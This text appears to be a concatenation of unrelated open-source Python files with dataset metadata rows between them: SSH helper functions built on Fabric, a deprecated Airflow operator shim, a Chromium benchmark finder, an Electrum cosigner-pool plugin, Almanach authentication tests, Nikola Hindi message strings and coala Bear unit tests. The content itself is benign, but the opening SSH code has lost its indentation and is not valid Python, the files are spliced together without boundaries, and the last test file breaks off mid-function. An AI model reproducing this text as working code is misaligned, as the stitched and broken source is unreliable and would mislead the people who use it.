LOG = logging.getLogger(__name__)
def ssh_status(ssh):
LOG.debug('Trying to get ssh status')
with fab.settings(
host_string=ssh.host,
user=ssh.user,
key_filename=os.path.join(ssh.env.envdir, ssh.key_filename),
timeout=ssh.connection_timeout):
try:
with fab.hide('running', 'stdout', 'stderr'):
fab.run('echo')
LOG.debug('Ssh connection is available')
return True
except SystemExit:
sys.exit()
except Exception:
LOG.debug('Ssh connection is not available')
return False
def ssh_put_content(ssh, file_content, remote_filename):
LOG.debug('Trying to put content into remote file: %s' % remote_filename)
with fab.settings(
host_string=ssh.host,
user=ssh.user,
key_filename=os.path.join(ssh.env.envdir, ssh.key_filename),
timeout=ssh.connection_timeout):
with tempfile.NamedTemporaryFile() as f:
f.write(file_content)
try:
fab.put(f.file, remote_filename)
except SystemExit:
sys.exit()
except Exception:
LOG.error('Error while putting content into '
'remote file: %s' % remote_filename)
raise
def ssh_put_file(ssh, filename, remote_filename):
LOG.debug('Trying to put file on remote host: '
'local=%s remote=%s' % (filename, remote_filename))
with fab.settings(
host_string=ssh.host,
user=ssh.user,
key_filename=os.path.join(ssh.env.envdir, ssh.key_filename),
timeout=ssh.connection_timeout):
try:
fab.put(filename, remote_filename)
except SystemExit:
sys.exit()
except Exception:
LOG.error('Error while putting file on remote host: '
'local=%s remote=%s' % (filename, remote_filename))
raise
def ssh_get_file(ssh, remote_filename, filename):
LOG.debug('Trying to get file from remote host: '
'local=%s remote=%s' % (filename, remote_filename))
with fab.settings(
host_string=ssh.host,
user=ssh.user,
key_filename=os.path.join(ssh.env.envdir, ssh.key_filename),
timeout=ssh.connection_timeout):
try:
fab.get(remote_filename, filename)
except SystemExit:
sys.exit()
except Exception:
LOG.error('Error while getting file from remote host: '
'local=%s remote=%s' % (filename, remote_filename))
raise
def ssh_run(ssh, command, command_timeout=10):
LOG.debug('Trying to run command on remote host: %s' % command)
with fab.settings(
host_string=ssh.host,
user=ssh.user,
key_filename=os.path.join(ssh.env.envdir, ssh.key_filename),
timeout=ssh.connection_timeout,
command_timeout=command_timeout,
warn_only=True):
try:
with fab.hide('running', 'stdout', 'stderr'):
return fab.run(command, pty=True)
except SystemExit:
sys.exit()
except Exception:
LOG.error('Error while putting file on remote host: '
'%s' % command)
raise
| apache-2.0 | -4,002,654,429,508,231,000 | 34.094828 | 77 | 0.589781 | false |
mistercrunch/airflow | airflow/contrib/operators/gcs_to_s3.py | 7 | 1631 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module is deprecated. Please use `airflow.providers.amazon.aws.transfers.gcs_to_s3`."""
import warnings
from airflow.providers.amazon.aws.transfers.gcs_to_s3 import GCSToS3Operator
warnings.warn(
"This module is deprecated. Please use `airflow.providers.amazon.aws.transfers.gcs_to_s3`.",
DeprecationWarning,
stacklevel=2,
)
class GoogleCloudStorageToS3Operator(GCSToS3Operator):
"""
This class is deprecated. Please use
`airflow.providers.amazon.aws.transfers.gcs_to_s3.GCSToS3Operator`.
"""
def __init__(self, *args, **kwargs):
warnings.warn(
"This class is deprecated. "
"Please use `airflow.providers.amazon.aws.transfers.gcs_to_s3.GCSToS3Operator`.",
DeprecationWarning,
stacklevel=3,
)
super().__init__(*args, **kwargs)
| apache-2.0 | 5,580,610,664,724,588,000 | 36.068182 | 96 | 0.720417 | false |
danakj/chromium | tools/perf/core/benchmark_finders.py | 14 | 1238 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import imp
import inspect
import os
import sys
from core import perf_benchmark
def GetClassFilePath(clazz):
""" Return the absolute file path to |clazz|. """
assert inspect.isclass(clazz)
path = os.path.abspath(inspect.getfile(clazz))
if path.endswith('.pyc'):
return path[:-1]
return path
def GetBenchmarkNamesForFile(top_level_dir, benchmark_file_dir):
""" Return the list of all benchmark names of benchmarks defined in
|benchmark_file_dir|.
"""
original_sys_path = sys.path[:]
top_level_dir = os.path.abspath(top_level_dir)
original_sys_path = sys.path[:]
if top_level_dir not in sys.path:
sys.path.append(top_level_dir)
try:
module = imp.load_source('_tmp_module_name_', benchmark_file_dir)
benchmark_names = []
for _, obj in inspect.getmembers(module):
if (inspect.isclass(obj) and issubclass(obj, perf_benchmark.PerfBenchmark)
and GetClassFilePath(obj) == benchmark_file_dir):
benchmark_names.append(obj.Name())
return sorted(benchmark_names)
finally:
sys.path = original_sys_path
| bsd-3-clause | 1,190,419,418,544,215,000 | 30.74359 | 80 | 0.705977 | false |
valesi/electrum | plugins/cosigner_pool/qt.py | 4 | 6879 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2014 Thomas Voegtlin
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import threading
import time
import xmlrpclib
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from electrum import bitcoin, util
from electrum import transaction
from electrum.plugins import BasePlugin, hook
from electrum.i18n import _
from electrum_gui.qt.transaction_dialog import show_transaction
import sys
import traceback
PORT = 12344
HOST = 'ecdsa.net'
server = xmlrpclib.ServerProxy('http://%s:%d'%(HOST,PORT), allow_none=True)
class Listener(util.DaemonThread):
def __init__(self, parent):
util.DaemonThread.__init__(self)
self.daemon = True
self.parent = parent
self.received = set()
self.keyhashes = []
def set_keyhashes(self, keyhashes):
self.keyhashes = keyhashes
def clear(self, keyhash):
server.delete(keyhash)
self.received.remove(keyhash)
def run(self):
while self.running:
if not self.keyhashes:
time.sleep(2)
continue
for keyhash in self.keyhashes:
if keyhash in self.received:
continue
try:
message = server.get(keyhash)
except Exception as e:
self.print_error("cannot contact cosigner pool")
time.sleep(30)
continue
if message:
self.received.add(keyhash)
self.print_error("received message for", keyhash)
self.parent.obj.emit(SIGNAL("cosigner:receive"), keyhash,
message)
# poll every 30 seconds
time.sleep(30)
class Plugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.listener = None
self.obj = QObject()
self.obj.connect(self.obj, SIGNAL('cosigner:receive'), self.on_receive)
self.keys = []
self.cosigner_list = []
@hook
def on_new_window(self, window):
self.update(window)
@hook
def on_close_window(self, window):
self.update(window)
def is_available(self):
return True
def update(self, window):
wallet = window.wallet
if wallet.wallet_type not in ['2of2', '2of3']:
return
if self.listener is None:
self.print_error("starting listener")
self.listener = Listener(self)
self.listener.start()
elif self.listener:
self.print_error("shutting down listener")
self.listener.stop()
self.listener = None
self.keys = []
self.cosigner_list = []
for key, xpub in wallet.master_public_keys.items():
K = bitcoin.deserialize_xkey(xpub)[-1].encode('hex')
_hash = bitcoin.Hash(K).encode('hex')
if wallet.master_private_keys.get(key):
self.keys.append((key, _hash, window))
else:
self.cosigner_list.append((window, xpub, K, _hash))
if self.listener:
self.listener.set_keyhashes([t[1] for t in self.keys])
@hook
def transaction_dialog(self, d):
d.cosigner_send_button = b = QPushButton(_("Send to cosigner"))
b.clicked.connect(lambda: self.do_send(d.tx))
d.buttons.insert(0, b)
self.transaction_dialog_update(d)
@hook
def transaction_dialog_update(self, d):
if d.tx.is_complete() or d.wallet.can_sign(d.tx):
d.cosigner_send_button.hide()
return
for window, xpub, K, _hash in self.cosigner_list:
if window.wallet == d.wallet and self.cosigner_can_sign(d.tx, xpub):
d.cosigner_send_button.show()
break
else:
d.cosigner_send_button.hide()
def cosigner_can_sign(self, tx, cosigner_xpub):
from electrum.transaction import x_to_xpub
xpub_set = set([])
for txin in tx.inputs:
for x_pubkey in txin['x_pubkeys']:
xpub = x_to_xpub(x_pubkey)
if xpub:
xpub_set.add(xpub)
return cosigner_xpub in xpub_set
def do_send(self, tx):
for window, xpub, K, _hash in self.cosigner_list:
if not self.cosigner_can_sign(tx, xpub):
continue
message = bitcoin.encrypt_message(tx.raw, K)
try:
server.put(_hash, message)
except Exception as e:
traceback.print_exc(file=sys.stdout)
window.show_message("Failed to send transaction to cosigning pool.")
return
window.show_message("Your transaction was sent to the cosigning pool.\nOpen your cosigner wallet to retrieve it.")
def on_receive(self, keyhash, message):
self.print_error("signal arrived for", keyhash)
for key, _hash, window in self.keys:
if _hash == keyhash:
break
else:
self.print_error("keyhash not found")
return
wallet = window.wallet
if wallet.use_encryption:
password = window.password_dialog('An encrypted transaction was retrieved from cosigning pool.\nPlease enter your password to decrypt it.')
if not password:
return
else:
password = None
if not window.question(_("An encrypted transaction was retrieved from cosigning pool.\nDo you want to open it now?")):
return
xprv = wallet.get_master_private_key(key, password)
if not xprv:
return
try:
k = bitcoin.deserialize_xkey(xprv)[-1].encode('hex')
EC = bitcoin.EC_KEY(k.decode('hex'))
message = EC.decrypt_message(message)
except Exception as e:
traceback.print_exc(file=sys.stdout)
window.show_message(str(e))
return
self.listener.clear(keyhash)
tx = transaction.Transaction(message)
show_transaction(tx, window, prompt_if_unsaved=True)
| gpl-3.0 | 4,982,712,453,873,649,000 | 32.8867 | 151 | 0.58933 | false |
internap/almanach | tests/auth/test_mixed_auth.py | 1 | 2037 | # Copyright 2016 Internap.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from flexmock import flexmock, flexmock_teardown
from hamcrest import raises, assert_that, calling, equal_to
from almanach.auth.mixed_auth import MixedAuthentication
from almanach.common.exceptions.authentication_failure_exception import AuthenticationFailureException
class MixedAuthenticationTest(unittest.TestCase):
def setUp(self):
self.auth_one = flexmock()
self.auth_two = flexmock()
self.auth_backend = MixedAuthentication([self.auth_one, self.auth_two])
def tearDown(self):
flexmock_teardown()
def test_with_token_valid_with_auth_one(self):
token = "my token"
self.auth_one.should_receive("validate").and_return(True)
assert_that(self.auth_backend.validate(token), equal_to(True))
def test_with_token_valid_with_auth_two(self):
token = "my token"
self.auth_one.should_receive("validate").and_raise(AuthenticationFailureException)
self.auth_two.should_receive("validate").and_return(True)
assert_that(self.auth_backend.validate(token), equal_to(True))
def test_with_token_valid_with_auth_twos(self):
token = "bad token"
self.auth_one.should_receive("validate").and_raise(AuthenticationFailureException)
self.auth_two.should_receive("validate").and_raise(AuthenticationFailureException)
assert_that(calling(self.auth_backend.validate).with_args(token), raises(AuthenticationFailureException))
| apache-2.0 | -3,238,183,001,054,495,000 | 41.4375 | 113 | 0.735886 | false |
schettino72/nikola | nikola/data/themes/base/messages/messages_hi.py | 6 | 2054 | # -*- encoding:utf-8 -*-
from __future__ import unicode_literals
MESSAGES = {
"%d min remaining to read": "पढ़ने में %d मिनट बाकी",
"(active)": "",
"Also available in:": "उपलब्ध भाषाएँ:",
"Archive": "आर्काइव",
"Categories": "श्रेणियाँ",
"Comments": "टिप्पणियाँ",
"LANGUAGE": "हिन्दी",
"Languages:": "भाषाएँ:",
"More posts about %s": "%s के बारे में अौर पोस्टें",
"Newer posts": "नई पोस्टें",
"Next post": "अगली पोस्ट",
"No posts found.": "कोई पोस्ट नहीं मिल सकी",
"Nothing found.": "कुछ नहीं मिल सका",
"Older posts": "पुरानी पोस्टें",
"Original site": "असली साइट",
"Posted:": "पोस्टेड:",
"Posts about %s": "%s के बारे में पोस्टें",
"Posts for year %s": "साल %s की पोस्टें",
"Posts for {month} {day}, {year}": "{day} {month} {year} की पोस्टें",
"Posts for {month} {year}": "{month} {year} की पोस्टें",
"Previous post": "पिछली पोस्ट",
"Publication date": "प्रकाशन की तारीख",
"RSS feed": "आर एस एस फ़ीड",
"Read in English": "हिन्दी में पढ़िए",
"Read more": "और पढ़िए",
"Skip to main content": "मुख्य सामग्री पर जाएँ",
"Source": "सोर्स",
"Subcategories:": "",
"Tags and Categories": "टैग्स और श्रेणियाँ",
"Tags": "टैग्स",
"Write your page here.": "",
"Write your post here.": "",
"old posts, page %d": "पुरानी पोस्टें, पृष्ठ %d",
"page %d": "पृष्ठ %d",
}
| mit | -8,039,683,895,320,288,000 | 34.641026 | 73 | 0.471942 | false |
coala/coala | tests/bears/BearTest.py | 4 | 31575 | import pdb
import os
from collections import defaultdict
import datetime
from io import BytesIO, StringIO
import multiprocessing
import unittest
from os.path import abspath, exists, isfile, join, getmtime
from tempfile import TemporaryDirectory, NamedTemporaryFile
import shutil
from freezegun import freeze_time
from unittest.mock import patch
import requests
import requests_mock
from coalib.coala_main import run_coala
from coalib.bearlib.aspects.collections import AspectList
from coalib.bearlib.aspects.Metadata import CommitMessage
from coalib.bearlib.languages.Language import Language, Languages
from coalib.bears.Bear import (
Bear, Debugger, _setting_is_enabled, _is_debugged, _is_profiled)
from coalib.bears.BEAR_KIND import BEAR_KIND
from coalib.bears.GlobalBear import GlobalBear
from coalib.bears.LocalBear import LocalBear
from coalib.results.Result import Result
from coalib.results.TextPosition import ZeroOffsetError
from coalib.output.printers.LOG_LEVEL import LOG_LEVEL
from coalib.output.printers.LogPrinter import LogPrinter
from coalib.processes.communication.LogMessage import LogMessage
from coalib.settings.Section import Section
from coalib.settings.Setting import Setting, language
from pyprint.ConsolePrinter import ConsolePrinter
from coala_utils.ContextManagers import prepare_file
from tests.TestUtilities import bear_test_module
class BadTestBear(Bear):
def __init__(self, section, queue):
Bear.__init__(self, section, queue)
@staticmethod
def kind():
return BEAR_KIND.GLOBAL
def run(self):
raise NotImplementedError
class TestBear(Bear):
BEAR_DEPS = {BadTestBear}
def __init__(self, section, queue):
Bear.__init__(self, section, queue)
@staticmethod
def kind():
return BEAR_KIND.GLOBAL
def run(self):
self.print('set', 'up', delimiter='=')
self.err('teardown')
self.err()
class TestOneBear(LocalBear):
def __init__(self, section, queue):
Bear.__init__(self, section, queue)
def run(self, x: int, y: str, z: int = 79, w: str = 'kbc'):
yield 1
yield 2
class TestTwoBear(Bear):
def run(self, *args, **kwargs):
yield 1
yield 2
yield 3
class TestThreeBear(Bear):
def run(self, *args, **kwargs):
pass
class TypedTestBear(Bear):
def __init__(self, section, queue):
Bear.__init__(self, section, queue)
self.was_executed = False
def run(self, something: int):
self.was_executed = True
return []
class ZeroOffsetLocalBear(LocalBear):
def __init__(self, section, queue, error_message):
Bear.__init__(self, section, queue)
self.error_message = error_message
def run(self, filename, file):
raise ZeroOffsetError(self.error_message)
class ZeroOffsetGlobalBear(Bear):
def __init__(self, section, queue, error_message):
Bear.__init__(self, section, queue)
self.error_message = error_message
@staticmethod
def kind():
return BEAR_KIND.GLOBAL
def run(self):
raise ZeroOffsetError(self.error_message)
class BearWithPrerequisites(Bear):
prerequisites_fulfilled = True
def __init__(self, section, queue, prerequisites_fulfilled):
BearWithPrerequisites.prerequisites_fulfilled = prerequisites_fulfilled
Bear.__init__(self, section, queue)
self.was_executed = False
def run(self):
self.was_executed = True
return []
@classmethod
def check_prerequisites(cls):
return cls.prerequisites_fulfilled
class StandAloneBear(Bear):
def run(self, x: int, y: int, z: int = 33):
"""
Test run.
:param x: First value.
:param y: Second value.
:param z: Third value.
"""
yield x
yield y
yield z
class DependentBear(Bear):
BEAR_DEPS = {StandAloneBear}
def run(self, y: int, w: float):
"""
Test run with more params.
:param y: Second value, but better.
:param w: Fourth value.
"""
yield y
yield w
class aspectsTestBear(Bear, aspects={
'detect': [CommitMessage.Shortlog.ColonExistence],
'fix': [CommitMessage.Shortlog.TrailingPeriod],
}, languages=['Python', 'C#']):
pass
class aspectsDetectOnlyTestBear(Bear, aspects={
'detect': [CommitMessage.Shortlog.ColonExistence],
}, languages=['Python']):
pass
class aspectsFixOnlyTestBear(Bear, aspects={
'fix': [CommitMessage.Shortlog.TrailingPeriod],
}, languages=['Python']):
pass
class BearWithLanguage(Bear):
def __init__(self, section, queue):
Bear.__init__(self, section, queue)
@staticmethod
def kind():
return BEAR_KIND.GLOBAL
def run(self, language: language = language('Python 3.4')):
yield language
class BearTestBase(unittest.TestCase):
def setUp(self):
self.queue = multiprocessing.Queue()
self.settings = Section('test_settings')
self.uut = TestBear(self.settings, self.queue)
def tearDown(self):
if exists(self.uut.data_dir):
shutil.rmtree(self.uut.data_dir)
class BearTest(BearTestBase):
def test_languages(self):
self.assertIs(type(aspectsTestBear.languages), Languages)
self.assertIn('Python', aspectsTestBear.languages)
self.assertIn('csharp', aspectsTestBear.languages)
self.assertNotIn('javascript', aspectsTestBear.languages)
def test_default_aspects(self):
assert type(Bear.aspects) is defaultdict
assert type(Bear.aspects['detect']) is AspectList
assert type(Bear.aspects['fix']) is AspectList
assert Bear.aspects['detect'] == Bear.aspects['fix'] == []
def test_no_fix_aspects(self):
assert type(aspectsDetectOnlyTestBear.aspects) is defaultdict
assert type(aspectsDetectOnlyTestBear.aspects['detect']) is AspectList
assert type(aspectsDetectOnlyTestBear.aspects['fix']) is AspectList
assert aspectsDetectOnlyTestBear.aspects['fix'] == []
assert (aspectsDetectOnlyTestBear.aspects['detect'] ==
[CommitMessage.Shortlog.ColonExistence])
assert (CommitMessage.Shortlog.ColonExistence in
aspectsDetectOnlyTestBear.aspects['detect'])
def test_no_detect_aspects(self):
assert type(aspectsFixOnlyTestBear.aspects) is defaultdict
assert type(aspectsFixOnlyTestBear.aspects['detect']) is AspectList
assert type(aspectsFixOnlyTestBear.aspects['fix']) is AspectList
assert aspectsFixOnlyTestBear.aspects['detect'] == []
assert (aspectsFixOnlyTestBear.aspects['fix'] ==
[CommitMessage.Shortlog.TrailingPeriod])
assert (CommitMessage.Shortlog.TrailingPeriod in
aspectsFixOnlyTestBear.aspects['fix'])
def test_detect_and_fix_aspects(self):
assert type(aspectsTestBear.aspects) is defaultdict
assert type(aspectsTestBear.aspects['detect']) is AspectList
assert type(aspectsTestBear.aspects['fix']) is AspectList
assert aspectsTestBear.aspects == {
'detect': [CommitMessage.Shortlog.ColonExistence],
'fix': [CommitMessage.Shortlog.TrailingPeriod],
}
assert (CommitMessage.Shortlog.ColonExistence in
aspectsTestBear.aspects['detect'])
assert (CommitMessage.Shortlog.TrailingPeriod in
aspectsTestBear.aspects['fix'])
def test_simple_api(self):
self.assertRaises(TypeError, TestBear, self.settings, 2)
self.assertRaises(TypeError, TestBear, None, self.queue)
self.assertRaises(NotImplementedError, Bear.kind)
base = Bear(self.settings, None)
self.assertRaises(NotImplementedError, base.run)
self.assertEqual(base.get_non_optional_settings(), {})
def test_message_queue(self):
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG,
'Running bear TestBear...')
self.check_message(LOG_LEVEL.DEBUG, 'set=up')
self.check_message(LOG_LEVEL.ERROR, 'teardown')
def test_bad_bear(self):
self.uut = BadTestBear(self.settings, self.queue)
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear BadTestBear failed to run. Take a look at '
'debug messages (`-V`) for further '
'information.')
# debug message contains custom content, dont test this here
self.queue.get()
def test_print_filename_LocalBear(self):
self.uut = LocalBear(self.settings, self.queue)
self.uut.execute('filename.py', 'file\n')
self.check_message(LOG_LEVEL.DEBUG)
# Fails because of no run() implementation
self.check_message(LOG_LEVEL.ERROR,
'Bear LocalBear failed to run on file filename.py. '
'Take a look at debug messages (`-V`) for further '
'information.')
def test_print_no_filename_GlobalBear(self):
self.uut = GlobalBear(None, self.settings, self.queue)
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
# Fails because of no run() implementation
self.check_message(LOG_LEVEL.ERROR,
'Bear GlobalBear failed to run. Take a look at '
'debug messages (`-V`) for further '
'information.')
def test_zero_line_offset_LocalBear(self):
error_message = 'Line offset cannot be zero.'
self.uut = ZeroOffsetLocalBear(self.settings,
self.queue,
error_message)
self.uut.execute('filename.py', 'file\n')
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear ZeroOffsetLocalBear violated one-based '
'offset convention.', error_message)
def test_zero_column_offset_LocalBear(self):
error_message = 'Column offset cannot be zero.'
self.uut = ZeroOffsetLocalBear(self.settings,
self.queue,
error_message)
self.uut.execute('filename.py', 'file\n')
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear ZeroOffsetLocalBear violated one-based '
'offset convention.', error_message)
def test_zero_line_and_column_offset_LocalBear(self):
error_message = 'Line and column offset cannot be zero.'
self.uut = ZeroOffsetLocalBear(self.settings,
self.queue,
error_message)
self.uut.execute('filename.py', 'file\n')
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear ZeroOffsetLocalBear violated one-based '
'offset convention.', error_message)
def test_zero_line_offset_GlobalBear(self):
error_message = 'Line offset cannot be zero.'
self.uut = ZeroOffsetGlobalBear(self.settings,
self.queue,
error_message)
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear ZeroOffsetGlobalBear violated one-based '
'offset convention.', error_message)
def test_zero_column_offset_GlobalBear(self):
error_message = 'Column offset cannot be zero.'
self.uut = ZeroOffsetGlobalBear(self.settings,
self.queue,
error_message)
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear ZeroOffsetGlobalBear violated one-based '
'offset convention.', error_message)
def test_zero_line_and_column_offset_GlobalBear(self):
error_message = 'Line and column offset cannot be zero.'
self.uut = ZeroOffsetGlobalBear(self.settings,
self.queue,
error_message)
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.ERROR,
'Bear ZeroOffsetGlobalBear violated one-based '
'offset convention.', error_message)
def test_inconvertible(self):
self.uut = TypedTestBear(self.settings, self.queue)
self.settings.append(Setting('something', '5'))
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.assertTrue(self.uut.was_executed)
self.settings.append(Setting('something', 'nonsense'))
self.uut.was_executed = False
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.check_message(LOG_LEVEL.WARNING)
self.assertTrue(self.queue.empty())
self.assertFalse(self.uut.was_executed)
def check_message(self, log_level, message=None, regex=False):
msg = self.queue.get()
self.assertIsInstance(msg, LogMessage)
if message:
if regex:
self.assertRegexpMatches(msg.message, message)
else:
self.assertEqual(msg.message, message)
self.assertEqual(msg.log_level, log_level, msg)
def test_no_queue(self):
uut = TestBear(self.settings, None)
uut.execute() # No exceptions
def test_dependencies(self):
self.assertEqual(Bear.BEAR_DEPS, set())
self.assertEqual(Bear.missing_dependencies([]), set())
self.assertEqual(Bear.missing_dependencies([BadTestBear]), set())
self.assertEqual(TestBear.missing_dependencies([]), {BadTestBear})
self.assertEqual(TestBear.missing_dependencies([BadTestBear]), set())
self.assertEqual(TestBear.missing_dependencies([TestBear]),
{BadTestBear})
self.assertEqual(TestBear.missing_dependencies([TestBear,
BadTestBear]),
set())
def test_check_prerequisites(self):
uut = BearWithPrerequisites(self.settings, self.queue, True)
uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.assertTrue(self.queue.empty())
self.assertTrue(uut.was_executed)
self.assertRaisesRegex(RuntimeError,
'The bear BearWithPrerequisites does not '
'fulfill all requirements\\.',
BearWithPrerequisites,
self.settings,
self.queue,
False)
self.check_message(LOG_LEVEL.ERROR,
'The bear BearWithPrerequisites does not fulfill '
'all requirements.')
self.assertTrue(self.queue.empty())
self.assertRaisesRegex(RuntimeError,
'The bear BearWithPrerequisites does not '
'fulfill all requirements\\. Just because '
'I want to\\.',
BearWithPrerequisites,
self.settings,
self.queue,
'Just because I want to.')
self.check_message(LOG_LEVEL.ERROR,
'The bear BearWithPrerequisites does not fulfill '
'all requirements. Just because I want to.')
self.assertTrue(self.queue.empty())
def test_get_non_optional_settings(self):
self.assertEqual(StandAloneBear.get_non_optional_settings(recurse=True),
{'x': ('First value.', int),
'y': ('Second value.', int)})
# Test settings of dependency bears. Also test settings-override-
# behaviour for dependency bears with equal setting names.
self.assertEqual(DependentBear.get_non_optional_settings(recurse=True),
{'x': ('First value.', int),
'y': ('Second value, but better.', int),
'w': ('Fourth value.', float)})
self.assertEqual(DependentBear.get_non_optional_settings(recurse=False),
{'y': ('Second value, but better.', int),
'w': ('Fourth value.', float)})
def test_no_warning_debug_enabled_LocalBear(self):
self.settings.append(Setting('log_level', 'DEBUG'))
self.uut = LocalBear(self.settings, self.queue)
self.uut.execute('filename.py', 'file\n')
self.check_message(LOG_LEVEL.DEBUG, 'Running bear LocalBear...')
# Fails because of no run() implementation
self.check_message(LOG_LEVEL.DEBUG,
'The bear LocalBear raised an exception. If you '
'are the author of this bear, please make sure to '
'catch all exceptions. If not and this error '
'annoys you, you might want to get in contact with '
'the author of this bear.\n\nTraceback information '
'is provided below:', True)
self.assertRaises(NotImplementedError)
def test_no_warning_debug_enabled_GlobalBear(self):
self.settings.append(Setting('log_level', 'DEBUG'))
self.uut = GlobalBear(None, self.settings, self.queue)
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG, 'Running bear GlobalBear...')
# Fails because of no run() implementation
self.check_message(LOG_LEVEL.DEBUG,
'The bear GlobalBear raised an exception. If you '
'are the author of this bear, please make sure to '
'catch all exceptions. If not and this error '
'annoys you, you might want to get in contact with '
'the author of this bear.\n\nTraceback information '
'is provided below:', True)
self.assertRaises(NotImplementedError)
def test_get_config_dir(self):
section = Section('default')
section.append(Setting('files', '**', '/path/to/dir/config'))
uut = TestBear(section, None)
self.assertEqual(uut.get_config_dir(), abspath('/path/to/dir'))
def test_new_result(self):
bear = Bear(self.settings, None)
result = bear.new_result('test message', '/tmp/testy')
expected = Result.from_values(bear, 'test message', '/tmp/testy')
self.assertEqual(result, expected)
def test_bear_with_default_language(self):
self.uut = BearWithLanguage(self.settings, self.queue)
result = self.uut.execute()[0]
self.assertIsInstance(result, Language)
self.assertEqual(str(result), 'Python 3.4')
self.check_message(LOG_LEVEL.DEBUG)
def test_bear_with_specific_language(self):
self.uut = BearWithLanguage(self.settings, self.queue)
# This should be ignored
self.settings['language'] = 'Java'
# Use this instead
self.settings.language = Language['HTML 5.1']
result = self.uut.execute()[0]
self.assertIsInstance(result, Language)
self.assertEqual(str(result), 'Hypertext Markup Language 5.1')
self.check_message(LOG_LEVEL.DEBUG)
# Mock test added to solve the coverage problem by DebugBearsTest
@patch('pdb.Pdb.do_continue')
def test_custom_continue(self, do_continue):
section = Section('name')
section.append(Setting('debug_bears', 'True'))
bear = Bear(section, self.queue)
args = ()
self.assertEqual(Debugger(bear).do_quit(args), 1)
pdb.Pdb.do_continue.assert_called_once_with(args)
# side_effect effectively implements run() method of bear
@patch('coalib.bears.Bear.Debugger.runcall', side_effect=((1, 2), 1, 2))
def test_debug_run_with_return(self, runcall):
section = Section('name')
section.append(Setting('debug_bears', 'True'))
my_bear = Bear(section, self.queue)
args = ()
kwargs = {}
self.assertEqual(my_bear.run_bear_from_section(args, kwargs), [1, 2])
@patch('coalib.bears.Bear.Debugger.runcall', return_value=None)
def test_debug_run_with_no_return(self, runcall):
section = Section('name')
section.append(Setting('debug_bears', 'True'))
my_bear = Bear(section, self.queue)
args = ()
kwargs = {}
self.assertIsNone(my_bear.run_bear_from_section(args, kwargs))
def test_do_settings(self):
section = Section('name', None)
section.append(Setting('x', '85'))
section.append(Setting('y', 'kbc3'))
section.append(Setting('z', '75'))
bear = TestOneBear(section, self.queue)
output = StringIO()
dbg = Debugger(bear, stdout=output)
arg = ()
self.assertEqual(dbg.do_settings(arg), 1)
output = output.getvalue().splitlines()
self.assertEqual(output[0], 'x = 85')
self.assertEqual(output[1], "y = 'kbc3'")
self.assertEqual(output[2], 'z = 75')
self.assertEqual(output[3], "w = 'kbc'")
with self.assertRaises(ValueError):
Debugger(bear=None)
def test_is_debugged(self):
with self.assertRaises(ValueError):
_is_debugged(bear=None)
section = Section('name')
uut = Bear(section, self.queue)
self.assertEqual(_is_debugged(uut), False)
section.append(Setting('debug_bears', 'tRuE'))
self.assertEqual(_is_debugged(uut), True)
section.append(Setting('debug_bears', '0'))
self.assertEqual(_is_debugged(uut), False)
section.append(Setting('debug_bears', 'Bear, ABear'))
self.assertEqual(_is_debugged(uut), True)
section.append(Setting('debug_bears', 'abc, xyz'))
self.assertEqual(_is_debugged(uut), False)
@patch('cProfile.Profile.dump_stats')
def test_profiler_with_no_directory_exists(self, dump_stats):
args = ()
kwargs = {}
section = Section('name')
section.append(Setting('profile', 'tRuE'))
bear = TestTwoBear(section, self.queue)
self.assertEqual(bear.run_bear_from_section(args, kwargs), [1, 2, 3])
dump_stats.assert_called_once_with(join(os.getcwd(),
'name_TestTwoBear.prof'))
section.append(Setting('profile', 'abc'))
bear = TestTwoBear(section, self.queue)
self.assertEqual(bear.run_bear_from_section(args, kwargs), [1, 2, 3])
dump_stats.assert_called_with(os.path.join(
bear.profile, 'name_TestTwoBear.prof'))
os.rmdir('abc')
section.append(Setting('profile', '1'))
bear = TestThreeBear(section, self.queue)
